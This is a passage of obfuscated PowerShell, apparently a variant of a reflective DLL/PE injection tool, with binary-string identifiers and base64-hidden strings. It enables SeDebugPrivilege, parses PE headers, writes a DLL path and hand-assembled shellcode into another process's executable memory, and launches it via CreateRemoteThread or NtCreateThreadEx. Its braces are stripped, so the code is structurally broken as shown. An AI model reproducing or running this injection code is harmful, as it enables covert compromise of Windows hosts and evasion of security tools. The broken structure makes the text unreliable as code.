Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAG4AbgBvAHQAIABhAGQAZAAgAGIAeQB0AGUAYQByAHIAYQB5AHMAIABvAGYAIABkAGkAZgBmAGUAcgBlAG4AdAAgAHMAaQB6AGUAcwA=')))
return [BitConverter]::ToInt64(${01011100110011010}, 0)
Function _00010110101001010
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Int64]
${_01001011110000011},
[Parameter(Position = 1, Mandatory = $true)]
[Int64]
${_00111110010011101}
[Byte[]]${01001111110100001} = [BitConverter]::GetBytes(${_01001011110000011})
[Byte[]]${10001000000000100} = [BitConverter]::GetBytes(${_00111110010011101})
if (${01001111110100001}.Count -eq ${10001000000000100}.Count)
for (${01101000000100101} = ${01001111110100001}.Count-1; ${01101000000100101} -ge 0; ${01101000000100101}--)
if (${01001111110100001}[${01101000000100101}] -gt ${10001000000000100}[${01101000000100101}])
return $true
elseif (${01001111110100001}[${01101000000100101}] -lt ${10001000000000100}[${01101000000100101}])
return $false
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAG4AbgBvAHQAIABjAG8AbQBwAGEAcgBlACAAYgB5AHQAZQAgAGEAcgByAGEAeQBzACAAbwBmACAAZABpAGYAZgBlAHIAZQBuAHQAIABzAGkAegBlAA==')))
return $false
Function Convert-UIntToInt
Param(
[Parameter(Position = 0, Mandatory = $true)]
[UInt64]
$Value
[Byte[]]${01011111100110111} = [BitConverter]::GetBytes($Value)
return ([BitConverter]::ToInt64(${01011111100110111}, 0))
Function _00100010111110111
Param(
[Parameter(Position = 0, Mandatory = $true)]
$Value
)
${10011110011010000} = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Value.GetType()) * 2
${10100111010001000} = "0x{0:X$(${10011110011010000})}" -f [Int64]$Value
return ${10100111010001000}
Function _10111001011100100
Param(
[Parameter(Position = 0, Mandatory = $true)]
[String]
${_00011000000111011},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
${_00110100101000100},
[Parameter(Position = 2, Mandatory = $true)]
[IntPtr]
${_01110111110010110},
[Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]
[IntPtr]
${_00100011000001010}
[IntPtr]${00000011001011010} = [IntPtr](_01101001110001101 (${_01110111110010110}) (${_00100011000001010}))
${01100100110010111} = ${_00110100101000100}.EndAddress
if ((_00010110101001010 (${_00110100101000100}.PEHandle) (${_01110111110010110})) -eq $true)
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAHkAaQBuAGcAIAB0AG8AIAB3AHIAaQB0AGUAIAB0AG8AIABtAGUAbQBvAHIAeQAgAHMAbQBhAGwAbABlAHIAIAB0AGgAYQBuACAAYQBsAGwAbwBjAGEAdABlAGQAIABhAGQAZAByAGUAcwBzACAAcgBhAG4AZwBlAC4AIAAkAHsAXwAwADAAMAAxADEAMAAwADAAMAAwADAAMQAxADEAMAAxADEAfQA=')))
if ((_00010110101001010 (${00000011001011010}) (${01100100110010111})) -eq $true)
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAHkAaQBuAGcAIAB0AG8AIAB3AHIAaQB0AGUAIAB0AG8AIABtAGUAbQBvAHIAeQAgAGcAcgBlAGEAdABlAHIAIAB0AGgAYQBuACAAYQBsAGwAbwBjAGEAdABlAGQAIABhAGQAZAByAGUAcwBzACAAcgBhAG4AZwBlAC4AIAAkAHsAXwAwADAAMAAxADEAMAAwADAAMAAwADAAMQAxADEAMAAxADEAfQA=')))
Function _01011110000000101
Param(
[Parameter(Position=0, Mandatory = $true)]
[Byte[]]
${_00101110110110110},
[Parameter(Position=1, Mandatory = $true)]
[IntPtr]
${_10010100011101100}
for (${10110100111011010} = 0; ${10110100111011010} -lt ${_00101110110110110}.Length; ${10110100111011010}++)
[System.Runtime.InteropServices.Marshal]::WriteByte(${_10010100011101100}, ${10110100111011010}, ${_00101110110110110}[${10110100111011010}])
Function _00101111101010001
Param
[OutputType([Type])]
[Parameter( Position = 0)]
[Type[]]
${_01010010100011010} = (New-Object Type[](0)),
[Parameter( Position = 1 )]
[Type]
${_10101111001111110} = [Void]
${01010101000100100} = [AppDomain]::CurrentDomain
${01000001000010111} = New-Object System.Reflection.AssemblyName($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGYAbABlAGMAdABlAGQARABlAGwAZQBnAGEAdABlAA=='))))
${01011010111011001} = ${01010101000100100}.DefineDynamicAssembly(${01000001000010111}, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
${00101100111000111} = ${01011010111011001}.DefineDynamicModule($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAE0AZQBtAG8AcgB5AE0AbwBkAHUAbABlAA=='))), $false)
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQB5AEQAZQBsAGUAZwBhAHQAZQBUAHkAcABlAA=='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBsAGEAcwBzACwAIABQAHUAYgBsAGkAYwAsACAAUwBlAGEAbABlAGQALAAgAEEAbgBzAGkAQwBsAGEAcwBzACwAIABBAHUAdABvAEMAbABhAHMAcwA='))), [System.MulticastDelegate])
${00100101100110010} = ${10001111001010101}.DefineConstructor($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBUAFMAcABlAGMAaQBhAGwATgBhAG0AZQAsACAASABpAGQAZQBCAHkAUwBpAGcALAAgAFAAdQBiAGwAaQBjAA=='))), [System.Reflection.CallingConventions]::Standard, ${_01010010100011010})
${00100101100110010}.SetImplementationFlags($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAA='))))
${00010111100001001} = ${10001111001010101}.DefineMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAbwBrAGUA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABOAGUAdwBTAGwAbwB0ACwAIABWAGkAcgB0AHUAYQBsAA=='))), ${_10101111001111110}, ${_01010010100011010})
${00010111100001001}.SetImplementationFlags($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAA='))))
echo ${10001111001010101}.CreateType()
Function _10001000101010101
Param
[OutputType([IntPtr])]
[Parameter( Position = 0, Mandatory = $True )]
[String]
${_10100011010001011},
[Parameter( Position = 1, Mandatory = $True )]
[String]
${_10010100011011100}
${10010110000110111} = [AppDomain]::CurrentDomain.GetAssemblies() |
? { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBkAGwAbAA=')))) }
${00101101111010000} = ${10010110000110111}.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIALgBVAG4AcwBhAGYAZQBOAGEAdABpAHYAZQBNAGUAdABoAG8AZABzAA=='))))
${10100001011111110} = ${00101101111010000}.GetMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQATQBvAGQAdQBsAGUASABhAG4AZABsAGUA'))))
${00101011111111000} = ${00101101111010000}.GetMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzAA=='))), [reflection.bindingflags] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA='))), $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);
${10111000110001111} = ${10100001011111110}.Invoke($null, @(${_10100011010001011}))
${10100010010011100} = New-Object IntPtr
${01010110011110000} = New-Object System.Runtime.InteropServices.HandleRef(${10100010010011100}, ${10111000110001111})
echo ${00101011111111000}.Invoke($null, @([System.Runtime.InteropServices.HandleRef]${01010110011110000}, ${_10010100011011100}))
Function Enable-SeDebugPrivilege
Param(
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Functions,
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Types,
[Parameter(Position = 3, Mandatory = $true)]
[System.Object]
$Win32Constants
[IntPtr]${01110010011011000} = $Win32Functions.GetCurrentThread.Invoke()
if (${01110010011011000} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABnAGUAdAAgAHQAaABlACAAaABhAG4AZABsAGUAIAB0AG8AIAB0AGgAZQAgAGMAdQByAHIAZQBuAHQAIAB0AGgAcgBlAGEAZAA=')))
[IntPtr]${01000000010001011} = [IntPtr]::Zero
[Bool]${01111011110110011} = $Win32Functions.OpenThreadToken.Invoke(${01110010011011000}, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]${01000000010001011})
if (${01111011110110011} -eq $false)
${00011001000100011} = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
if (${00011001000100011} -eq $Win32Constants.ERROR_NO_TOKEN)
${01111011110110011} = $Win32Functions.ImpersonateSelf.Invoke(3)
if (${01111011110110011} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABpAG0AcABlAHIAcwBvAG4AYQB0AGUAIABzAGUAbABmAA==')))
${01111011110110011} = $Win32Functions.OpenThreadToken.Invoke(${01110010011011000}, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]${01000000010001011})
if (${01111011110110011} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABPAHAAZQBuAFQAaAByAGUAYQBkAFQAbwBrAGUAbgAuAA==')))
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABPAHAAZQBuAFQAaAByAGUAYQBkAFQAbwBrAGUAbgAuACAARQByAHIAbwByACAAYwBvAGQAZQA6ACAAJAB7ADAAMAAwADEAMQAwADAAMQAwADAAMAAxADAAMAAwADEAMQB9AA==')))
[IntPtr]${00001101000001001} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))
${01111011110110011} = $Win32Functions.LookupPrivilegeValue.Invoke($null, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAEQAZQBiAHUAZwBQAHIAaQB2AGkAbABlAGcAZQA='))), ${00001101000001001})
if (${01111011110110011} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABjAGEAbABsACAATABvAG8AawB1AHAAUAByAGkAdgBpAGwAZQBnAGUAVgBhAGwAdQBlAA==')))
[UInt32]${10001001010101111} = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)
[IntPtr]${10100101111101010} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${10001001010101111})
${01100011110101010} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10100101111101010}, [Type]$Win32Types.TOKEN_PRIVILEGES)
${01100011110101010}.PrivilegeCount = 1
${01100011110101010}.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${00001101000001001}, [Type]$Win32Types.LUID)
${01100011110101010}.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${01100011110101010}, ${10100101111101010}, $true)
${01111011110110011} = $Win32Functions.AdjustTokenPrivileges.Invoke(${01000000010001011}, $false, ${10100101111101010}, ${10001001010101111}, [IntPtr]::Zero, [IntPtr]::Zero)
${00011001000100011} = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
if ((${01111011110110011} -eq $false) -or (${00011001000100011} -ne 0))
[System.Runtime.InteropServices.Marshal]::FreeHGlobal(${10100101111101010})
Function _00100111111000100
Param(
[Parameter(Position = 1, Mandatory = $true)]
[IntPtr]
${_10011010100110011},
[Parameter(Position = 2, Mandatory = $true)]
[IntPtr]
${_01110111110010110},
[Parameter(Position = 3, Mandatory = $false)]
[IntPtr]
${_00011010100011100} = [IntPtr]::Zero,
[Parameter(Position = 4, Mandatory = $true)]
[System.Object]
$Win32Functions
[IntPtr]${01110010011011110} = [IntPtr]::Zero
${01010101101001001} = [Environment]::OSVersion.Version
if ((${01010101101001001} -ge (New-Object $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBlAHIAcwBpAG8AbgA='))) 6,0)) -and (${01010101101001001} -lt (New-Object $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBlAHIAcwBpAG8AbgA='))) 6,2)))
${01111010001100010}= $Win32Functions.NtCreateThreadEx.Invoke([Ref]${01110010011011110}, 0x1FFFFF, [IntPtr]::Zero, ${_10011010100110011}, ${_01110111110010110}, ${_00011010100011100}, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)
${10100011100000000} = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
if (${01110010011011110} -eq [IntPtr]::Zero)
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQByAHIAbwByACAAaQBuACAATgB0AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkAEUAeAAuACAAUgBlAHQAdQByAG4AIAB2AGEAbAB1AGUAOgAgACQAewAwADEAMQAxADEAMAAxADAAMAAwADEAMQAwADAAMAAxADAAfQAuACAATABhAHMAdABFAHIAcgBvAHIAOgAgACQAewAxADAAMQAwADAAMAAxADEAMQAwADAAMAAwADAAMAAwADAAfQA=')))
${01110010011011110} = $Win32Functions.CreateRemoteThread.Invoke(${_10011010100110011}, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, ${_01110111110010110}, ${_00011010100011100}, 0, [IntPtr]::Zero)
if (${01110010011011110} -eq [IntPtr]::Zero)
Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQByAHIAbwByACAAYwByAGUAYQB0AGkAbgBnACAAcgBlAG0AbwB0AGUAIAB0AGgAcgBlAGEAZAAsACAAdABoAHIAZQBhAGQAIABoAGEAbgBkAGwAZQAgAGkAcwAgAG4AdQBsAGwA'))) -ErrorAction Stop
return ${01110010011011110}
Function _01110101010101000
Param(
[Parameter(Position = 0, Mandatory = $true)]
[IntPtr]
${_10111111000001111},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Types
${00011111111110000} = New-Object System.Object
${10011101010100010} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${_10111111000001111}, [Type]$Win32Types.IMAGE_DOS_HEADER)
[IntPtr]${10111100101111011} = [IntPtr](_01101001110001101 ([Int64]${_10111111000001111}) ([Int64][UInt64]${10011101010100010}.e_lfanew))
${00011111111110000} | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ${10111100101111011}
${10001010001011101} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10111100101111011}, [Type]$Win32Types.IMAGE_NT_HEADERS64)
if (${10001010001011101}.Signature -ne 0x00004550)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAEkATQBBAEcARQBfAE4AVABfAEgARQBBAEQARQBSACAAcwBpAGcAbgBhAHQAdQByAGUALgA=')))
if (${10001010001011101}.OptionalHeader.Magic -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ATgBUAF8ATwBQAFQASQBPAE4AQQBMAF8ASABEAFIANgA0AF8ATQBBAEcASQBDAA=='))))
${00011111111110000} | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ${10001010001011101}
${00011111111110000} | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true
${00010011100101101} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10111100101111011}, [Type]$Win32Types.IMAGE_NT_HEADERS32)
${00011111111110000} | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ${00010011100101101}
${00011111111110000} | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false
return ${00011111111110000}
Function _01110011101110110
Param(
[Parameter( Position = 0, Mandatory = $true )]
[Byte[]]
${_00000000110100000},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Types
${_00110100101000100} = New-Object System.Object
[IntPtr]${00101011111001001} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${_00000000110100000}.Length)
[System.Runtime.InteropServices.Marshal]::Copy(${_00000000110100000}, 0, ${00101011111001001}, ${_00000000110100000}.Length) | Out-Null
${00011111111110000} = _01110101010101000 -_10111111000001111 ${00101011111001001} -Win32Types $Win32Types
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFADYANABCAGkAdAA='))) -Value (${00011111111110000}.PE64Bit)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwByAGkAZwBpAG4AYQBsAEkAbQBhAGcAZQBCAGEAcwBlAA=='))) -Value (${00011111111110000}.IMAGE_NT_HEADERS.OptionalHeader.ImageBase)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASQBtAGEAZwBlAA=='))) -Value (${00011111111110000}.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASABlAGEAZABlAHIAcwA='))) -Value (${00011111111110000}.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABsAGwAQwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMA'))) -Value (${00011111111110000}.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)
[System.Runtime.InteropServices.Marshal]::FreeHGlobal(${00101011111001001})
return ${_00110100101000100}
Function _00011000111100111
Param(
[Parameter( Position = 0, Mandatory = $true)]
[IntPtr]
${_10111111000001111},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Types,
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Constants
if (${_10111111000001111} -eq $null -or ${_10111111000001111} -eq [IntPtr]::Zero)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFAEgAYQBuAGQAbABlACAAaQBzACAAbgB1AGwAbAAgAG8AcgAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA=')))
${_00110100101000100} = New-Object System.Object
${00011111111110000} = _01110101010101000 -_10111111000001111 ${_10111111000001111} -Win32Types $Win32Types
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name PEHandle -Value ${_10111111000001111}
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value (${00011111111110000}.IMAGE_NT_HEADERS)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value (${00011111111110000}.NtHeadersPtr)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name PE64Bit -Value (${00011111111110000}.PE64Bit)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASQBtAGEAZwBlAA=='))) -Value (${00011111111110000}.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
if (${_00110100101000100}.PE64Bit -eq $true)
[IntPtr]${10010110010010000} = [IntPtr](_01101001110001101 ([Int64]${_00110100101000100}.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value ${10010110010010000}
[IntPtr]${10010110010010000} = [IntPtr](_01101001110001101 ([Int64]${_00110100101000100}.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value ${10010110010010000}
if ((${00011111111110000}.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name FileType -Value $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABMAEwA')))
elseif ((${00011111111110000}.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE)
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name FileType -Value $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBYAEUA')))
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAZgBpAGwAZQAgAGkAcwAgAG4AbwB0ACAAYQBuACAARQBYAEUAIABvAHIAIABEAEwATAA=')))
return ${_00110100101000100}
Function _01001010011111000
Param(
[Parameter(Position=0, Mandatory=$true)]
[IntPtr]
${_10010001100101011},
[Parameter(Position=1, Mandatory=$true)]
[IntPtr]
${_01010010101010011}
${01001001001010110} = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
${00111101100010100} = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi(${_01010010101010011})
${01101011111000100} = [UIntPtr][UInt64]([UInt64]${00111101100010100}.Length + 1)
${10001010000101011} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, [IntPtr]::Zero, ${01101011111000100}, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
if (${10001010000101011} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzAA==')))
[UIntPtr]${01101111010110100} = [UIntPtr]::Zero
${01100111110111001} = $Win32Functions.WriteProcessMemory.Invoke(${_10010001100101011}, ${10001010000101011}, ${_01010010101010011}, ${01101011111000100}, [Ref]${01101111010110100})
if (${01100111110111001} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIAB3AHIAaQB0AGUAIABEAEwATAAgAHAAYQB0AGgAIAB0AG8AIAByAGUAbQBvAHQAZQAgAHAAcgBvAGMAZQBzAHMAIABtAGUAbQBvAHIAeQA=')))
if (${01101011111000100} -ne ${01101111010110100})
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABpAGQAbgAnAHQAIAB3AHIAaQB0AGUAIAB0AGgAZQAgAGUAeABwAGUAYwB0AGUAZAAgAGEAbQBvAHUAbgB0ACAAbwBmACAAYgB5AHQAZQBzACAAdwBoAGUAbgAgAHcAcgBpAHQAaQBuAGcAIABhACAARABMAEwAIABwAGEAdABoACAAdABvACAAbABvAGEAZAAgAHQAbwAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzAA==')))
${01100100100000111} = $Win32Functions.GetModuleHandle.Invoke($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('awBlAHIAbgBlAGwAMwAyAC4AZABsAGwA'))))
${10111111101110010} = $Win32Functions.GetProcAddress.Invoke(${01100100100000111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABvAGEAZABMAGkAYgByAGEAcgB5AEEA'))))
[IntPtr]${00100010011111001} = [IntPtr]::Zero
if (${_00110100101000100}.PE64Bit -eq $true)
${10011010100110110} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, [IntPtr]::Zero, ${01101011111000100}, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
if (${10011010100110110} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzACAAZgBvAHIAIAB0AGgAZQAgAHIAZQB0AHUAcgBuACAAdgBhAGwAdQBlACAAbwBmACAATABvAGEAZABMAGkAYgByAGEAcgB5AEEA')))
${01111010111011111} = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
${00111110111000001} = @(0x48, 0xba)
${01101100101010110} = @(0xff, 0xd2, 0x48, 0xba)
${01010000101110011} = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
${10100011000000001} = ${01111010111011111}.Length + ${00111110111000001}.Length + ${01101100101010110}.Length + ${01010000101110011}.Length + (${01001001001010110} * 3)
${01101100010011100} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${10100011000000001})
${10101000010001101} = ${01101100010011100}
_01011110000000101 -_00101110110110110 ${01111010111011111} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01111010111011111}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10001010000101011}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
_01011110000000101 -_00101110110110110 ${00111110111000001} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${00111110111000001}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10111111101110010}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
_01011110000000101 -_00101110110110110 ${01101100101010110} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01101100101010110}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10011010100110110}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
_01011110000000101 -_00101110110110110 ${01010000101110011} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01010000101110011}.Length)
${00110110110011110} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, [IntPtr]::Zero, [UIntPtr][UInt64]${10100011000000001}, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
if (${00110110110011110} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzACAAZgBvAHIAIABzAGgAZQBsAGwAYwBvAGQAZQA=')))
${01100111110111001} = $Win32Functions.WriteProcessMemory.Invoke(${_10010001100101011}, ${00110110110011110}, ${10101000010001101}, [UIntPtr][UInt64]${10100011000000001}, [Ref]${01101111010110100})
if ((${01100111110111001} -eq $false) -or ([UInt64]${01101111010110100} -ne [UInt64]${10100011000000001}))
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIAB3AHIAaQB0AGUAIABzAGgAZQBsAGwAYwBvAGQAZQAgAHQAbwAgAHIAZQBtAG8AdABlACAAcAByAG8AYwBlAHMAcwAgAG0AZQBtAG8AcgB5AC4A')))
${01011010001111011} = _00100111111000100 -_10011010100110011 ${_10010001100101011} -_01110111110010110 ${00110110110011110} -Win32Functions $Win32Functions
${01111011110110011} = $Win32Functions.WaitForSingleObject.Invoke(${01011010001111011}, 20000)
if (${01111011110110011} -ne 0)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkACAAdABvACAAYwBhAGwAbAAgAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAgAGYAYQBpAGwAZQBkAC4A')))
[IntPtr]${10000111100011011} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${01001001001010110})
${01111011110110011} = $Win32Functions.ReadProcessMemory.Invoke(${_10010001100101011}, ${10011010100110110}, ${10000111100011011}, [UIntPtr][UInt64]${01001001001010110}, [Ref]${01101111010110100})
if (${01111011110110011} -eq $false)
